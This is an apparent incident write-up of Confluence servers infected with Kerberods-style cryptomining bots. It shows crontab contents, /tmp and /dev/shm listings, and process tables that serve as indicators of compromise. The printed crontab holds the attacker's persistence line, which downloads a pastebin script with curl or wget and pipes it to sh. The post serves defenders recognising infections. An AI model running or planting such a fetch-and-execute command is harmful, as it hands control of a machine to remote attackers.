we'll post findings from an infected confluence-systems we investigated recently, to show how it looks/feel like. the most systems we took a look at were infected with mining-bots like kerberods.
Infection took place via the latest and greatest Confluence-RCE-Vuln
awkward crontab-entries for a user
/var/spool/cron/crontabs # ls -lrth
total 4.0K
-rw------- 1 root netdev 285 Apr 15 15:34 tmp.Rj8JOI
-rw-r--r-- 1 root netdev 0 Apr 16 12:42 root
cat tmp.Rj8JOI
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Mon Apr 15 17:34:25 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/10 * * * * (curl -fsSL https://pastebin.com/raw/404NoMore||wget -q -O- https://pastebin.com/raw/404NoMore)|sh
a good amount of load, even on non-used systems
- at least your monitoring can detect this
# uptime
06:51:47 up 200 days, 23:55, 0 users, load average: 7.53, 6.82, 6.13
07:34:00 up 46 days, 22:57, 0 users, load average: 6.04, 6.10, 6.04
files in /tmp that look suspicious
- see below for the lok_bot
- at least you get an infection-date
# ls -la /tmp
total 1460
drwxrwxrwt 1 root root 4096 Apr 29 08:05 .
drwxr-xr-x 1 root ro 4096 May 10 2018 ..
-rw-r--r-- 1 usr1 usr1 0 Apr 27 14:17 .354da7
-rw-r--r-- 1 usr1 usr1 5 Apr 22 06:23 .XIMunix
drwxr-xr-x 2 usr1 usr1 4096 Apr 19 17:45 .dba <-- Bot
drwxrwx--- 2 usr1 usr1 4096 Apr 27 21:42 .sysinfo <-- Bot
-rw-r--r-- 1 usr1 usr1 20094 Apr 27 20:33 fk <-- KillerBot
drwxr-xr-x 2 usr1 usr1 4096 Mar 13 08:41 hsperfdata_usr1
drwxr-xr-x 2 root root 4096 Oct 7 2016 hsperfdata_root
-rwx------ 1 usr1 usr1 480296 Apr 27 21:42 ib_cm
-rwx------ 1 usr1 usr1 480296 Apr 27 21:42 kworker_0:2
-rwx------ 1 usr1 usr1 473096 Apr 22 18:30 kworker_1:1
-rw-r--r-- 1 usr1 usr1 0 Apr 19 18:04 lok <-- Bot
-rw-r--r-- 1 usr1 usr1 12 Apr 27 20:33 tmp1 <-- Bot
-rw-r--r-- 1 usr1 usr1 0 Apr 21 18:25 .changgggeerror <--Bot
drwxr-xr-x 2 usr1 usr1 4096 Apr 27 15:18 .dba <-- Bot
-rw-r--r-- 1 usr1 usr1 0 Apr 29 06:38 .dbb <-- Bot
-rw-r--r-- 1 usr1 usr1 290 Apr 17 06:57 04dlOCl <-- Bot
-rw-r--r-- 1 usr1 usr1 290 Apr 21 04:50 09m4JAO <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 17 07:17 0B74AiN <-- Bot
-rw-r--r-- 1 usr1 usr1 290 Apr 24 06:28 0C3GIEc <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 14 22:50 1LgBCd8 <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 14 21:03 jEgLnBc <-- Bot
-rwxr-xr-x 1 usr1 usr1 1099016 Apr 29 06:38 jGcLFA1 <-- Bot
drwxr-xr-x 2 usr1 usr1 4096 Apr 19 12:47 khugepageds <-- Bot
-rw-r--r-- 1 usr1 usr1 290 Apr 23 00:22 lIFa09m <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 14 11:26 lLNCeDg <-- Bot
-rw-r--r-- 1 usr1 usr1 290 Apr 15 00:37 lMBH5ME <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 27 14:55 lalmC9B <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 24 17:08 lc6hCJM <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 23 03:33 lgl7kBp <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 23 11:32 m3eP059 <-- Bot
--- 400 lines deleted ----
files in /dev/shm that looks suspiciuous
- see below for the bot
- at least you get an infection-date
# ls -la /dev/shm
total 8
drwxrwxrwt 2 root root 60 Apr 18 17:53 .
drwxr-xr-x 5 root root 340 Oct 10 2018 ..
-rw-r--r-- 1 daemon daemon 7141 Apr 18 16:33 bt1.txt
the first confirmed/successful waves started 2019-04-14
-rwxrwxrwx 1 daemon daemon 621K Mar 18 06:51 1mm6dgJ <-- maybe?
-rw-r--r-- 1 daemon daemon 0 Apr 12 07:48 ec2a6 <-- ???
-rw-r--r-- 1 daemon daemon 0 Apr 12 07:48 de33f4f911f20761 <-- ???
-rw-r--r-- 1 daemon daemon 290 Apr 14 01:12 L2AJgih <-- exploit
-rw-r--r-- 1 daemon daemon 160 Apr 14 01:12 77Ink36 <-- exploit
-rw-r--r-- 1 daemon daemon 290 Apr 14 01:15 H4m361b <-- exploit
-rw-r--r-- 1 daemon daemon 160 Apr 14 01:15 1Gn6il2 <-- exploit
-rw-r--r-- 1 daemon daemon 290 Apr 14 01:29 JnImMDp <-- exploit
-rw-r--r-- 1 daemon daemon 160 Apr 14 01:29 8N128a8 <-- exploit
-rw-r--r-- 1 daemon daemon 290 Apr 14 01:50 1bI0A61 <-- exploit
-rw-r--r-- 1 daemon daemon 160 Apr 14 01:50 Jb2jHPC <-- exploit
-rw-r--r-- 1 daemon daemon 290 Apr 14 02:03 aEEC4K5 <-- exploit
looooots of zombie-processes
# ps -ef
UID PID PPID C STIME TTY TIME CMD
usr1 1 0 1 Mar13 ? 12:56:36 /usr/bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Xms1024m -Xmx8192m -XX:MaxPermSize=512m -XX:+UseG1GC -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2019-03-13_08-41-53.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -XX:-PrintGCDetails -XX:+PrintGCTimeStamps -XX:-PrintTenuringDistribution -Djava.endorsed.dirs=/opt/atlassian/confluence/endorsed -classpath /opt/atlassian/confluence/bin/bootstrap.jar:/opt/atlassian/confluence/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence -Dcatalina.home=/opt/atlassian/confluence -Djava.io.tmpdir=/opt/atlassian/confluence/temp org.apache.catalina.startup.Bootstrap start
usr1 336 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 339 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 354 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 361 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 382 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 403 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 415 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 427 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 462 1 0 Apr22 ? 00:00:00 [kill] <defunct>
usr1 508 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 516 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 529 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 539 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 544 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 597 1 0 Apr22 ? 00:00:00 [kill] <defunct>
usr1 599 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 642 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 644 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 648 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 663 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 688 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 756 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 858 1 0 Apr22 ? 00:00:00 [kill] <defunct>
usr1 903 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 960 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 1015 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 1072 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 1086 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 1131 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 1274 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 1339 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1341 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 1350 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1395 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1422 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1434 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1458 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 1523 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1559 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1614 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 1664 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1726 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 1727 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 1748 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 1767 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 1828 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 1850 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 1886 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1930 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 1954 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 2064 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 2145 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2239 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 2266 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2298 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 2321 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 2322 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 2325 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 2360 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 2387 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2409 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2472 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 2524 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 2605 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 2629 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2788 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 2824 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 2858 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 2879 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 2881 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 2890 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2900 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 2932 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 2941 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 3037 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 3138 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 3164 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 3316 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 3344 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 3367 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 3573 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 3586 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 3622 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 3842 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 3865 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 4089 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 4168 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 4341 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 4353 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 5258 1 0 Apr22 ? 00:00:01 [sh] <defunct>
usr1 5363 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 5393 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 5405 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 5425 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 5429 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 5577 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 5909 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 5973 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 5991 1 82 Apr21 ? 6-20:15:12 [khugepageds] <defunct>
usr1 6028 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 6085 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 6149 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 6174 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 6284 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 6299 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 6485 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 6535 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 6560 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 6574 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 6664 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 6704 1 0 Apr19 ? 00:00:01 [sh] <defunct>
usr1 6751 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 6853 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 6877 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 6907 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 6959 1 0 Apr22 ? 00:00:00 [kill] <defunct>
usr1 7083 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 7118 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 7163 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 7292 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 7300 1 0 Apr20 ? 00:00:01 [sh] <defunct>
usr1 7513 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 7522 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 7537 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 7653 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 7771 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 7820 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 8022 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 8056 1 0 Apr20 ? 00:00:01 [sh] <defunct>
usr1 8198 1 0 Apr14 ? 00:00:00 [kerberods] <defunct>
usr1 8203 1 0 Apr14 ? 00:12:14 [kerberods] <defunct>
usr1 8252 1 27 Apr14 ? 3-23:22:25 [khugepageds] <defunct>
usr1 8656 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 8743 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 8912 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 9042 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 9763 1 0 Apr10 ? 00:00:00 [kerberods] <defunct>
usr1 9768 1 0 Apr10 ? 00:37:13 [kerberods] <defunct>
usr1 9771 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 9806 1 39 Apr10 ? 7-09:16:20 [khugepageds] <defunct>
usr1 10022 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 10036 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 10505 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 10717 1 0 Apr12 ? 00:00:00 [kerberods] <defunct>
usr1 10722 1 0 Apr12 ? 00:17:13 [kerberods] <defunct>
usr1 10761 1 65 Apr12 ? 11-06:36:39 [khugepageds] <defunct>
usr1 10764 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 10834 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 10854 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 10907 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 10943 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 11083 1 0 Apr22 ? 00:00:00 [kerberods] <defunct>
usr1 11089 1 0 Apr22 ? 00:26:43 [kerberods] <defunct>
usr1 11138 1 0 Apr22 ? 00:11:07 [khugepageds] <defunct>
usr1 11390 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 11512 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 11743 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 12151 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 12174 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 12247 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 12404 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 12534 1 0 Apr22 ? 00:00:00 [26d60ac947903df] <defunct>
usr1 12536 1 31 Apr22 ? 2-01:39:08 [kworker_1:1] <defunct>
usr1 12664 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 12707 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 12832 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 12893 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 12920 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 13074 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 13135 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 13687 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 13723 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 13747 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 13929 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 14452 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 14589 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 14829 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 15044 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 15452 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 15692 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 15698 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 15701 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 15704 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 15772 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 15831 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 15946 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 15982 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 16055 1 0 Apr23 ? 00:00:00 [26d60ac947903df] <defunct>
usr1 16057 1 99 Apr23 ? 28-10:29:11 [ib_cm] <defunct>
usr1 16353 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 16459 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 16674 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 16697 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 16717 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 16783 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 16796 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 16797 1 0 Apr23 ? 00:00:00 [sed] <defunct>
usr1 16798 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 16871 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 16872 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 16873 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 16874 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 16875 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 16953 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 17117 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 17123 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 17284 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 17397 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 17728 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 17799 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 17973 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 18140 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 18225 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 18445 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 18476 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 18580 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 18824 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 18829 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 18830 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 18833 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 18836 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 18852 1 0 Apr21 ? 00:00:00 [sleep] <defunct>
usr1 18870 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 19051 1 0 Apr16 ? 00:00:00 [sh] <defunct>
usr1 19270 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 19315 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 19438 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 19471 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 19635 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 19639 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 19728 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 19889 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 20022 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 20023 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 20024 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 20025 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 20026 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 20298 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 20371 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 20388 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 20417 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 20476 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 20477 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 20478 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 20479 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 20480 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 20533 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 20747 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 20771 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 21018 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 21097 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 21170 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 21305 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 21310 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 21311 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 21312 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 21313 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 21314 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 21321 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 21324 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 21327 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 21366 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 21579 1 0 Apr19 ? 00:00:08 [sh] <defunct>
usr1 21785 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 21809 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 21878 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 21931 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 22375 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 22614 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 22747 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 22748 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 22749 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 22750 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 22751 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 22758 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 22761 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 22764 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 23119 1 0 Apr23 ? 00:00:00 [curl] <defunct>
usr1 23171 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 23172 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23173 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23174 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23175 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 23176 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23177 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23178 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23179 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 23180 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23181 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 23432 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 23769 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 23800 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 23810 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 23858 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 23882 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 24055 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 24135 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 24675 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 24683 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 24686 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 24689 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 24767 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 25036 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 25230 1 0 Apr19 ? 00:00:32 [khugepageds] <defunct>
usr1 25289 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 25360 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 25493 1 0 Apr24 ? 00:00:00 [ps] <defunct>
usr1 25494 1 0 Apr24 ? 00:00:00 [grep] <defunct>
usr1 25495 1 0 Apr24 ? 00:00:00 [grep] <defunct>
usr1 25496 1 0 Apr24 ? 00:00:00 [awk] <defunct>
usr1 25497 1 0 Apr24 ? 00:00:00 [xargs] <defunct>
usr1 25507 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 25510 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 25513 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 25854 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 25996 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 26108 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 26348 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 26588 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 26642 1 0 Apr19 ? 00:00:00 [sleep] <defunct>
usr1 26829 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 26835 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 26838 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 26841 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 26910 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 26973 1 0 Apr19 ? 00:00:00 [bash] <defunct>
usr1 27220 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 27223 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 27247 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 27309 1 0 Apr19 ? 00:00:00 [sleep] <defunct>
usr1 27383 1 0 Apr19 ? 00:00:11 [sh] <defunct>
usr1 27448 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 27479 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 27691 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 27699 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 27702 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 27705 1 0 Apr24 ? 00:00:00 [sh] <defunct>
